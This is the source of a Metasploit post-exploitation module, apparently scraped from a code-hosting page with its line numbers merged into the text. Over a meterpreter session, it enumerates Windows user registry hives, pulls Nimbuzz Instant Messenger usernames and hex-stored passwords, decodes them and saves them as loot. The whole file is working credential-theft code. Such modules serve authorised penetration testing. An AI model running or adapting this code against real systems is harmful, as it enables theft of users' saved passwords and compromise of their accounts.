Path: blob/master/modules/post/windows/gather/credentials/nimbuzz.rb
19500 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Post6include Msf::Post::Windows::Registry7include Msf::Auxiliary::Report89def initialize(info = {})10super(11update_info(12info,13'Name' => 'Windows Gather Nimbuzz Instant Messenger Password Extractor',14'Description' => %q{15This module extracts the account passwords saved by Nimbuzz Instant16Messenger in hex format.17},18'License' => MSF_LICENSE,19'Author' => [20'sil3ntdre4m <sil3ntdre4m[at]gmail.com>',21'Unknown', # SecurityXploded Team, www.SecurityXploded.com22],23'Platform' => [ 'win' ],24'SessionTypes' => [ 'meterpreter' ],25'Notes' => {26'Stability' => [CRASH_SAFE],27'SideEffects' => [],28'Reliability' => []29}30)31)32end3334def run35creds = Rex::Text::Table.new(36'Header' => 'Nimbuzz Instant Messenger Credentials',37'Indent' => 1,38'Columns' =>39[40'User',41'Password'42]43)4445registry_enumkeys('HKU').each do |k|46next unless k.include?('S-1-5-21')47next if k.include?('_Classes')4849vprint_status("Looking at Key #{k}")50subkeys = registry_enumkeys("HKU\\#{k}\\Software\\Nimbuzz\\")5152if subkeys.nil? || (subkeys == '')53print_status('Nimbuzz Instant Messenger not installed for this user.')54next55end5657user = registry_getvaldata("HKU\\#{k}\\Software\\Nimbuzz\\PCClient\\Application\\", 'Username') || ''58hpass = registry_getvaldata("HKU\\#{k}\\Software\\Nimbuzz\\PCClient\\Application\\", 'Password')5960next if hpass.nil? || (hpass == '')6162hpass =~ /.{11}(.*)./63decpass = [::Regexp.last_match(1)].pack('H*')64print_good("User=#{user}, Password=#{decpass}")65creds << [user, decpass]66end6768print_status('Storing data...')69path = store_loot(70'nimbuzz.user.creds',71'text/csv',72session,73creds.to_csv,74'nimbuzz_user_creds.csv',75'Nimbuzz User Credentials'76)77print_good("Nimbuzz user credentials saved in: #{path}")78end79end808182